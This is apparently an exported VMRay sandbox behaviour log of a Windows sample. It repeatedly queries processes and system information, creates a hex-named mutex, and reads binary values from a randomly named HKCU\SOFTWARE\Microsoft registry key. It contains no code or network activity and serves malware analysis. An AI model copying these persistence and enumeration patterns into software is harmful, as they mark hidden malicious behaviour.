Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
For performance reasons, the remaining 1657 entries are omitted.
The remaining entries can be found in glog.xml.
Thread 0x414
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 True 1
Fn
Thread 0x4d0
(Host: 3, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0x7ac
(Host: 3, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0x4bc
(Host: 18, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY True 2
Fn
Data
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image